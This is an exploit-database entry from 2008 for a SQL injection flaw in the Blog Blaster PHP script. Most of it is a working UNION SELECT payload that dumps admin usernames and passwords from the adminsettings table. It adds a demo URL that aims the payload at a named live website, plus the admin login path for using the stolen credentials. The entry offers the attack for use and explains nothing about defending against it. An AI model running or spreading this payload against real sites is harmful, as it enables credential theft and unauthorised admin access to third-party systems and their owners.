id: 4017
date: 11/01/2008
title: YourFreeWorld Blog Blaster (id) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

==================================================================
YourFreeWorld Blog Blaster (id) Remote SQL Injection Vulnerability
==================================================================


Blog Blaster( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    : http://www.yourfreeworld.com/script/blogblaster.php

DorK   : :)

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.downlinegoldmine.com/blogblaster/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Admin Login :
_______
/admin/



#  0day.today [2023-03-26]  #